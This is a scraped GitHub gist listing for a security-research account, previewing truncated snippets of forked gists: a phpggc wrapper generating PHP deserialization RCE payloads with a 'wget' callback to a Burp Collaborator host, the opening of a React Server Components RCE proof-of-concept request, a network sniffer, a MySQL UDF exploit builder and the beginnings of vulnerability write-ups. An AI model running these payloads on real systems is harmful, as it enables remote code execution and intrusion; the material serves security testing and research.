javascript:(function(){
allowCopyAndPaste = function(e){
e.stopImmediatePropagation();
return true;
};
document.addEventListener('copy', allowCopyAndPaste, true);
document.addEventListener('paste', allowCopyAndPaste, true);
document.addEventListener('onpaste', allowCopyAndPaste, true);
})(); 
Marco hacks2learn
hacks2learn
/ phpggc-generate-payloads.sh
Created
April 13, 2026 11:09
— forked from honoki/phpggc-generate-payloads.sh
Automatically generate properly formatted RCE payloads for every gadget chain in phpggc.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # phpggc wrapper that automatically generates payloads for RCE gadgets | |
| function="system" | |
| command="wget http://your.burpcollaborator.net/?" | |
| # modify the options below depending on your use case | |
| options="-a -b -u -f" | |
| # generate gadget chains |
hacks2learn
/ microgpt.py
Created
February 14, 2026 13:44
— forked from karpathy/microgpt.py
microgpt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| The most atomic way to train and inference a GPT in pure, dependency-free Python. | |
| This file is the complete algorithm. | |
| Everything else is just efficiency. | |
| @karpathy | |
| """ | |
| import os # os.path.exists | |
| import math # math.log, math.exp |
hacks2learn
/ force-ctrl-c-v.md
Created
February 13, 2026 13:28
— forked from Gustavo-Kuze/force-ctrl-c-v.md
Enable copy and paste in a webpage from the browser console
hacks2learn
/ CVE-2025-55182.http
Created
December 5, 2025 12:09
— forked from maple3142/CVE-2025-55182.http
CVE-2025-55182 React Server Components RCE POC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| POST / HTTP/1.1 | |
| Host: localhost | |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36 | |
| Next-Action: x | |
| Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad | |
| Content-Length: 459 | |
| ------WebKitFormBoundaryx8jO2oVc6SWP3Sad | |
| Content-Disposition: form-data; name="0" |
hacks2learn
/ update_cookie_BambdaCA.java
Created
July 3, 2025 10:55
— forked from irsdl/update_cookie_BambdaCA.java
Automatically updates the Cookie header in Burp Repeater requests using Set-Cookie values from responses. This Bambda CustomAction preserves all existing cookies and only updates or adds values when necessary — ensuring session continuity without overwriting unrelated cookies.
hacks2learn
/ Get-Origins.ps1
Created
March 28, 2025 12:28
— forked from curi0usJack/Get-Origins.ps1
PowerShell code to map CDN (Classic or FrontDoor) to their Origin hostname.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Import-Module Az | |
| Connect-AzAccount | |
| $ipre = "^((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$" | |
| function Get-ClassicOrigins() { | |
| $profs = Get-AzCDNProfile | |
| $coll = @() | |
| foreach ($prof in $profs) { |
hacks2learn
/ research.md
Created
January 23, 2025 13:01
— forked from hackermondev/research.md
Unique 0-click deanonymization attack targeting Signal, Discord and hundreds of platform
hi, i'm daniel. i'm a 15-year-old high school junior. in my free time, i hack billion dollar companies and build cool stuff.
3 months ago, I discovered a unique 0-click deanonymization attack that allows an attacker to grab the location of any target within a 250 mile radius. With a vulnerable app installed on a target's phone (or as a background application on their laptop), an attacker can send a malicious payload and deanonymize you within seconds--and you wouldn't even know.
I'm publishing this writeup and research as a warning, especially for journalists, activists, and hackers, about this type of undetectable attack. Hundreds of applications are vulnerable, including some of the most popular apps in the world: Signal, Discord, Twitter/X, and others. Here's how it works:
By the numbers, Cloudflare is easily the most popular CDN on the market. It beats out competitors such as Sucuri, Amazon CloudFront, Akamai, and Fastly. In 2019, a major Cloudflare outage k
hacks2learn
/ SilentListener.py
Created
September 28, 2024 11:30
— forked from Dfte/SilentListener.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import argparse | |
| import ipaddress | |
| from os import path | |
| from time import sleep | |
| from shlex import split | |
| from scapy.all import sniff | |
| from threading import Thread | |
| from subprocess import Popen, PIPE | |
| valid_ranges = [] |
hacks2learn
/ cups-browsed.md
Created
September 27, 2024 12:30
— forked from stong/cups-browsed.md
CUPS disclosure leaked online. Not my report. The original author is @evilsocket
Original report
- Affected Vendor: OpenPrinting
- Affected Product: Several components of the CUPS printing system: cups-browsed, libppd, libcupsfilters and cups-filters.
- Affected Version: All versions <= 2.0.1 (latest release) and master.
- Significant ICS/OT impact? no
- Reporter: Simone Margaritelli [evilsocket@gmail.com]
- Vendor contacted? yes The vendor has been notified trough Github Advisories and all bugs have been confirmed:
hacks2learn
/ mysql-udf-build.sh
Created
November 26, 2023 02:32
— forked from kazkansouh/mysql-udf-build.sh
Simplify building MySQL UDF exploit for both Linux and Windows
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # This program is free software: you can redistribute it and/or modify | |
| # it under the terms of the GNU General Public License as published by | |
| # the Free Software Foundation, either version 3 of the License, or | |
| # (at your option) any later version. | |
| # | |
| # This program is distributed in the hope that it will be useful, | |
| # but WITHOUT ANY WARRANTY; without even the implied warranty of | |
| # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the |
NewerOlder